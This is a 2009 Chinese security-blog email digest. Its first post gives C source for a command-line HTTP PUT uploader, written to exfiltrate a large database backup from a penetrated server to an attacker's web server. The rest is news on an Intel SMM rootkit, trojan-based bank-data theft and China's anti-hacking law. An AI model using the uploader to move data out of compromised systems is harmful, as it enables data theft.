来自"鬼仔's Blog"的最新文章，如果您不希望再收到此邮件，请退订；如果您需要更换其它邮箱接收邮件，请点击这里！

Fuck The World!

命令行下的PUT方式上传大文件

Wed, 18 Mar 2009 18:56:23 +0800

文章作者：pt007[at]vip.sina.com
信息来源：邪恶八进制信息安全团队(www.eviloctal.com)

注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者。
最近做一个渗透,目标机为一台数据库服务器,对外没有开放,只能反连出来,上面有个100多M的数据库备份,用后门下载的时候总是掉线,听mickey说用PUT方式可以上传大文件,于是从网上找找了代码,写了个命令行下上传大文件的C程序.

代码:

#include <winsock2.h> #include <windows.h> #include <stdio.h> #include <wininet.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib")  void Usage (char *name);//帮助信息  BOOL UseHttpSendReqEx(HINTERNET hConnect, TCHAR *upFile, TCHAR *localFile) { INTERNET_BUFFERS BufferIn = {0}; DWORD dwBytesRead; DWORD dwBytesWritten; BYTE pBuffer[302480]; // Read from file in 300M chunks,最大支持300M文件  BOOL bRead, bRet;  BufferIn.dwStructSize = sizeof( INTERNET_BUFFERS ); //使用put方式上传文件: HINTERNET hRequest = HttpOpenRequest (hConnect, "PUT", localFile, NULL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, 0); if (!hRequest) { printf("Failed to open request handle: %lu\n", GetLastError ()); return FALSE; }  //打开指定的文件: HANDLE hFile = CreateFile (upFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("\nFailed to open local file %s.", upFile); return FALSE; }  BufferIn.dwBufferTotal = GetFileSize (hFile, NULL); printf ("File size is %d\n", BufferIn.dwBufferTotal );  if(!HttpSendRequestEx( hRequest, &BufferIn, NULL, HSR_INITIATE, 0)) { printf( "Error on HttpSendRequestEx %lu\n",GetLastError() ); return FALSE; }  DWORD sum = 0; do { if  (!(bRead = ReadFile (hFile, pBuffer, sizeof(pBuffer),&dwBytesRead, NULL))) { printf ("\nReadFile failed on buffer %lu.",GetLastError()); break; } if (!(bRet=InternetWriteFile( hRequest, pBuffer, dwBytesRead,&dwBytesWritten))) { printf ("\nInternetWriteFile failed %lu", GetLastError()); break; } sum += dwBytesWritten; } while (dwBytesRead == sizeof(pBuffer)) ;  CloseHandle (hFile); printf ("Actual written bytes: %d\nupload %s successed!\n", sum,localFile);  //结束一个HTTP请求: if(!HttpEndRequest(hRequest, NULL, 0, 0)) { printf( "Error on HttpEndRequest %lu \n", GetLastError()); return FALSE; } return TRUE; }  int main(int argc, char **argv)  { //put 127.0.0.1 /1.db c:\\wmpub\\1.exe if(argc!=4) { Usage(argv[0]); return 0; }  //char *ServerName="127.0.0.1"; //这里填写URL地址 char *ServerName=argv[1];  HINTERNET hSession = InternetOpen("HttpSendRequest",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); //同步方式 if(!hSession){ printf("Failed to open InternetOpen\n"); exit(0); } //连接到一个http服务: HINTERNET hConnect = InternetConnect(hSession, ServerName, INTERNET_DEFAULT_HTTP_PORT, //连接到80端口,可以修改成任意端口,比如53 NULL, NULL, INTERNET_SERVICE_HTTP, //服务类型HTTP，FTP或Gopher 0, 1);  if(!hConnect) { printf("error InternetConnect\n"); return 0; }  //TCHAR *putfile="c:\\wmpub\\1.exe"; //上传的程序 TCHAR *putfile=argv[3]; TCHAR *putlocalfile=argv[2]; BOOL sigh; sigh=UseHttpSendReqEx(hConnect,putfile,putlocalfile); if(!sigh) { printf("error UseHttpSendReqEx\n"); return 0; }  return 0; }  //输出帮助的典型方法: void Usage (char *name) { fprintf(stderr,"===============================================================================\n" "\t名称：利用PUT上传300M的大文件\n" "\t环境：Win2003+Visual C++ 6.0\n" "\t作者：pt007@vip.sina.com\n" "\tQQ：  7491805\n" "\t声明：本软件由pt007原创，转载请注明出处，谢谢!\n" "\t使用说明:1.db为上传后保存后的文件,c:\\wmpub\\1.exe为本地要上传的大文件,\n\t需要IIS里面设置允许写入!\n" "\t例子:%s 192.168.1.101 /1.db c:\\wmpub\\1.exe\n" "===============================================================================\n",name); }

put上传程序.rar

发表评论 | 分类：工具收集

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/2942.html

英特尔遭遇CPU级RootKit,目前无药可医

Wed, 18 Mar 2009 17:47:05 +0800

感谢Ben的翻译投递:
Intel CPU 缓存被暴漏洞,研究报告与 RootKit利用代码即将出炉。
"3月19日,我们将就Intel CPU 的缓存机制漏洞,公布一份报告及漏洞利用。相关攻击可以在目前大部分IntelCPU的主板上从Ring0提权至SMM。Rafal在几个小时内就做出了一份漏洞利用代码。" Joanna女强人在博客中写道。

本次漏洞利用的致命之处,在于它能将自身隐藏在SMM空间中,SMM权限高于VMM,设计上不受任何操作系统控制、关闭或禁用。实际应用中唯一能确认SMM 空间中运行代码的方法只有物理性的分离计算机固件。由于SMI优先于任何系统调用,任何操作系统都无法控制或读取SMM,使得SMM RootKit有超强的隐匿性。

其厉害程度与之前的BluePill相似,但比VMM攻击涉及到系统的更深层面。而 SMM自386时代就出现在Intel CPU中。

Joanna 和 Loic 这次将发布从未公布过的Intel缓冲HACK。

它不但可以控制SMM空间还能运行其新型RootKit,控制计算机。新的 RootKit 甚至有能力连接服务器更新代码,储存数据。运行于操作系统中的任何软件都将无法检测此类利用。

据 Joanna 说,Intel员工,对Intel的此类 CPU 缓存及SMM漏洞利用的署名讨论可以追溯到2005年。她与Loic于去年10月已经向Intel正式提交过报告。Intel将问题通知了CERT并将其归为漏洞VU#127284号。现在Intel已经知道漏洞的存在好多年了,却没有做出应有的修正。无奈,安全专家们别无选择,只能公布他们的发现。如果此漏洞利用真的已经存在数年,那么一定早已有人开始利用它。正如Joanna所说"漏洞就在那里,如果足够长的时间内没人理会,几乎可以肯定,怀着各种意图的人们将会发现它并将之利用,只是迟早的事。所以请不要责怪研究人员,他们发现并公布问题 - 他们实际上是为了帮助我们的社会。"
报告将于19号在此发布：
http://theinvisiblethings.blogspot.com/2009/03/independent-attack-discoveries.html

之前的 SMM 利用原理：
http://wwww.networkworld.com/news/2008/050908-black-hat-hackers-find-a.html?page=1

来源（NetworkWorld）
http://www.networkworld.com/community/node/39825

发表评论 | 分类：业界资讯

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/2940.html

几条新闻汇总[2008.3.18]

Wed, 18 Mar 2009 17:42:16 +0800

不一篇一篇的转了，不然RSS里一下更新那么多技术之外的东西，怕大家会烦。这几个新闻就给链接了。

刑法修正案(七)后黑客第一案上周宣判：
http://security.ctocio.com.cn/securitynews/457/8747457.shtml

攻破"天龙八部"获利76万两黑客昨受刑：
http://news.163.com/09/0312/14/5479J2GL00011229.html

"大小姐"木马赚1400万揭开特大网络黑客获利内幕：
http://www.nsfocus.net/news/7105

黑客软件制造者将被列入刑法处罚对象：
http://tech.163.com/08/1222/15/4TPD01C5000915BF.html

揭秘黑客产业链（2009.3.11）经济与法 CCTV.com
http://space.tv.cctv.com/video/VIDE1236776637559389

威胁，就在身边（2009.3.12）经济与法 CCTV.com
http://space.tv.cctv.com/video/VIDE1236862764222219

黑客破U盾须耗数百万年：
http://gzdaily.dayoo.com/html/2009-03/18/content_505201.htm

发表评论 | 分类：业界资讯

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/2939.html

央视315晚会：黑客盗取网银信息网上廉价出售

Wed, 18 Mar 2009 17:16:27 +0800

(本文来源：网易科技报道 )

网易科技讯 3月15日消息，央视315晚会今天曝光一名叫"顶狐"的黑客，通过自己制造木马程序，盗取大量用户的网上银行信息，用很低廉的价格在网上出售，危及大量网银用户的安全。

央视315晚会报道，"顶狐"通过木马程序，盗取个人的网银信息，后对盗取回来的信息分类整理，将密码等信息廉价出售，而网上银行用户信息则以400元每G的价格打包售出。这导致大量的网银用户存款被盗。

央视透露，"顶狐"已经被警方实抓捕。据警方透露，"顶狐"是一名黑客高手，2006年他编写了木马程序，从此开始了盗取个人信息的行当。顶狐还以免费下载的方式任由人下载和传播，顶狐偷偷给自己留了一手，黑客们盗取的所有信息都会自动回复到他的手中。每天存储在他电脑上的信息有3G，相当于15亿个汉字，这么大的信息量。

以下为央视315晚会实录：

解说：2007年1月福建泉州的蔡先生突然发现自己的一笔存款不翼而飞。2007年5月，江苏省无锡市温女士的信用卡被人分四次消费了2000元。紧接着，江西省一位姓陶的女士也向警方报案。究竟是什么人盗取了这些人的钱呢？

范中：发现这个案件所有的受害人的卡都开了网上银行。

解说：但是要从网上银行盗走这些钱，盗贼要知道储户的详细信息。很快一个网名叫"蚂蚁"的人进入了江苏省无锡市警方的视线。

警察：他就通过这种方式卖点卡。

解说：如果小额账户上的钱是被蚂蚁盗取的，那那些金额大的钱又去了哪里呢？警方在蚂蚁与一个网民的聊天中发现一个细节。

警察：我们发现一个帐号是福建泉州那边被盗21万的。

解说：这个发现让警察眼前一亮，他们很可能是主要的犯罪嫌疑人，警方立刻对他们实施了抓捕。这就是蚂蚁的电脑，警方很快从这台电脑里发现了多达一万多个用户的网上银行信息，还有用户的身份证号码、手机号码等等，几乎无所不有。

警察：这里边他成功盗窃的有500多个帐号，他所掌握的这一万多个网民的帐号随时随地有被盗的可能，只不过他还没有来得及继续作案就被我们抓住了。

解说：据蚂蚁交代，他掌握的信息都是从"顶狐"那买的。关系到无数家庭财产安全的个人信息，就这样在网上以如此低廉的价格被随意买卖。那么"顶狐"又是个什么样的人？他又怎么得到这些用户的信息的？根据蚂蚁提供的线索，警方在北京将顶狐抓获。

蒋文伟：他曾经是2005年瑞星排的十大病毒之一的制造者。

解说：这个就是顶狐，是一名黑客高手，2006年他编写了木马程序，从此开始了盗取个人信息的行当。顶狐还以免费下载的方式任由人下载和传播，顶狐偷偷给自己留了一手，黑客们盗取的所有信息都会自动回复到他的手中。

警察：每天存储在他电脑上的信息有3G，相当于15亿个汉字，这么大的信息量。

解说：顶狐对盗取回来的信息分类整理，将密码等信息廉价出售，而网上银行用户信息则以400元每G的价格打包售出。

警察：我们受害者往往在不知不觉中突然发现你的帐号已经被盗。

发表评论 | 分类：业界资讯

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/2938.html

惩处网络"黑客"有法可依

Wed, 18 Mar 2009 17:09:38 +0800

# 鬼仔：算是旧闻了，但是比较重要，贴上来。

惩处网络"黑客"有法可依：

http://www.gov.cn/jrzg/2009-03/01/content_1246914.htm

http://news.xinhuanet.com/newscenter/2009-02/28/content_10918374.htm

新华网北京２月２８日电（记者卫敏丽、邹声文）２８日，十一届全国人大常委会第七次会议表决通过刑法修正案（七）。令人关注的是，对于惩治网络"黑客"的违法犯罪行为，刑法增加了相关条款。这意味着，今后惩处网络"黑客"有法可依。

此前，刑法第２８５条规定，违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。

近年来，一些不法分子利用技术手段非法侵入法律规定以外的计算机信息系统，窃取他人账号、密码等信息，或者对大范围的他人计算机实施非法控制，严重危及网络安全。刑法原有的规定使司法机关在打击"黑客"犯罪时面临法律困扰。

鉴于上述情况，刑法修正案（七）在刑法第２８５条中增加两款作为第二款、第三款："违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。"

"提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。"

中华人民共和国刑法修正案（七）：

http://www.gov.cn/flfg/2009-02/28/content_1246438.htm